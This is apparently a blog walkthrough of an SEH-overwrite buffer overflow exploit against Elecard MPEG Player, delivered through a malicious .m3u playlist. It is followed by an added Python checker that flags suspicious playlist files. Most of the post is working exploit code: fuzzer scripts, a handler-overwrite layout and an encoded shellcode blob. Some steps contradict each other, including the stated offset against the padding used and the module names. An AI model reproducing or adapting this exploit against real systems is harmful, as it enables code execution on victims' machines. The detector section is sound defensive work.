Wednesday, 24 April 2013
Buffer Overflow: SEH-based exploit on Elecard MPEG Player
In this post I will write up my steps to exploit a media player application (Elecard MPEG Player) with SEH protection. Here are the steps:
1. install the application on a Windows XP machine
2. do the information gathering about the supported file types
3. from the IG I got the information: the target supports .m3u files and needs a header
4. create the fuzzer file with Python
file="seh.m3u"
junk="#EXTM3U\n"
junk+="\x41"*15000
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
5. run the fuzzer script to generate the m3u file
6. run the target and load the m3u fuzzer file
7. the target crashes
8. now open the target in OllyDbg to see what actually happened
9. run the target and load the m3u fuzzer file again
10. the target crashes. Look at the top left box: EBP and ESI are overwritten, but EIP is not, because the SEH handler caught the crash
11. to see the SEH chain go to View > SEH chain. Press Shift+F9 to pass the exception on, and the overwritten handler address ends up in EIP
12. the next step is to create a pattern with Metasploit and insert it into the fuzzer script
13. run the target from OllyDbg and load the m3u fuzzer file
14. look at the address in the SEH chain and find the offset using Metasploit
15. the offset is 8, which means 8 bytes are needed to reach the SEH handler
16. change the fuzzer script to confirm the exact position of the SEH handler
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*8 # 8 bytes of padding up to the SEH handler
junk+="\xEF\xBE\xAD\xDE" # 0xDEADBEEF should now show up as the handler address
junk+="\x90"*(15000-len(junk)) # fill the rest up to 15000 bytes
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
17. okay, the SEH handler address is pwned
18. the next step is to find a module that has a POP POP RETN sequence but does not have SafeSEH protection
19. I will try to use the esrcnet.dll module
20. now search for the POP POP RETN instruction sequence in the D3DIM7300 module
21. modify the fuzzer script
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4 # 4 bytes of padding up to nSEH
junk+="\xeb\x06\x90\x90" # nSEH: short jump 6 bytes forward, over the handler address
junk+="\xA6\xA0\x94\x73" # SEH handler: POP POP RETN address (POP ESI) in the chosen module
junk+="\x90"*(15000-len(junk)) # fill the rest up to 15000 bytes
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
22. generate the payload with msfweb; in this case I use a command that calls the calculator
23. insert the payload into the fuzzer script and run it
file="music.m3u"
junk="#EXTM3U\n"
junk+="\x90"*4 # 4 bytes of padding up to nSEH
junk+="\xeb\x06\x90\x90" # nSEH: short jump 6 bytes forward, over the handler address
junk+="\xA6\xA0\x94\x73" # SEH handler: POP POP RETN address in the chosen module
junk+="\x90"*16 # NOP padding where the short jump lands, then the payload
junk+=("\xbb\x10\xbf\xd7\x63\x29\xc9\xda\xc4\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x31\x5a\x10\x83\xc2\x04\x03\x4a\xb3\x35\x96\x96\x23\xfd\x59\x66"
"\xb4\x75\x1c\x5a\x3f\xf5\x9a\xda\x3e\xe9\x2e\x55\x59\x7e\x6f\x49"
"\x58\x6b\xd9\x02\x6e\xe0\xdb\xfa\xbe\x36\x42\xae\x45\x76\x01\xa9"
"\x84\xbd\xe7\xb4\xc4\xa9\x0c\x8d\x9c\x09\xe9\x84\xf9\xd9\xae\x42"
"\x03\x35\x36\x01\x0f\x82\x3c\x4a\x0c\x15\xa8\xff\x30\x9e\x2f\x14"
"\xc1\xfc\x0b\xee\x11\xcd\x93\x8a\x1e\x6e\x24\xd7\xe1\x17\x48\x5c"
"\xa1\xeb\xdb\x12\x3e\x59\x50\xba\x36\x4a\x6e\xb1\xc7\x3c\x71\xc5"
"\xc7\xb7\x1a\xf9\x98\xf6\x2c\x61\x71\x70\x28\xe2\xbd\xf9\x99\x8c"
"\x43\x26\xfb\x3f\xd4\x4e\x02\x35\x2a\x38\x04\xae\x50\xa7\x96\x53"
"\x97")
junk+="\x90"*(15000-len(junk))
file=open(file,"w")
file.write(junk)
print "file created successfully..."
file.close()
24. run the target without OllyDbg, load the m3u fuzzer file and see what happens
25. voila! the target is pwned!
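As an added, defender-side example (not part of the original post): a small Python 3 checker that flags .m3u files shaped like the trigger file above, that is a missing #EXTM3U header, entries far longer than any real path, bytes that are not valid UTF-8, and long runs of a single byte such as the 0x41 and 0x90 filler used here. The thresholds and the sample playlists are constructed assumptions, not values from the post.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "line_no kind detail")

M3U_HEADER = b"#EXTM3U"
MAX_LINE_LEN = 1024   # constructed threshold: real entries are short paths or URLs
MIN_RUN_LEN = 64      # a run of one byte this long looks like filler or a sled


def scan_m3u(data):
    """Return a list of Finding objects for suspicious constructs in raw .m3u bytes."""
    findings = []
    lines = data.split(b"\n")
    if not lines[0].rstrip(b"\r").startswith(M3U_HEADER):
        findings.append(Finding(1, "missing-header", "file does not start with #EXTM3U"))
    for n, line in enumerate(lines, 1):
        line = line.rstrip(b"\r")
        if len(line) > MAX_LINE_LEN:
            findings.append(Finding(n, "oversized-line", "%d bytes" % len(line)))
        # Non-ASCII paths are normal in playlists, so decode as UTF-8 instead of
        # rejecting every byte above 0x7e; undecodable bytes are what stands out.
        try:
            text = line.decode("utf-8")
        except UnicodeDecodeError:
            findings.append(Finding(n, "binary-content", "not valid UTF-8"))
        else:
            ctrl = sum(1 for ch in text if ord(ch) < 0x20 and ch != "\t")
            if ctrl:
                findings.append(Finding(n, "control-chars", "%d control characters" % ctrl))
        # Backreference regex: one byte repeated at least MIN_RUN_LEN times in a row.
        run = re.search(rb"(.)\1{%d,}" % (MIN_RUN_LEN - 1), line, re.DOTALL)
        if run:
            detail = "0x%02x repeated %d times" % (run.group(1)[0], len(run.group(0)))
            findings.append(Finding(n, "byte-run", detail))
    return findings


def is_suspicious(data):
    return bool(scan_m3u(data))


# Constructed samples: a normal playlist (including a non-ASCII path) and files
# shaped like the trigger above: header, then thousands of one filler byte.
BENIGN = b"#EXTM3U\n#EXTINF:213,Artist - Title\nC:\\Music\\track01.mp3\n"
BENIGN_UTF8 = "#EXTM3U\nC:\\Musik\\\u00dcbung.mp3\n".encode("utf-8")
FUZZ_A = b"#EXTM3U\n" + b"A" * 15000
FUZZ_NOP = b"#EXTM3U\n" + b"\x90" * 15000

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("fuzz_A", FUZZ_A), ("fuzz_NOP", FUZZ_NOP)]:
        print(name, [(f.line_no, f.kind, f.detail) for f in scan_m3u(sample)])
```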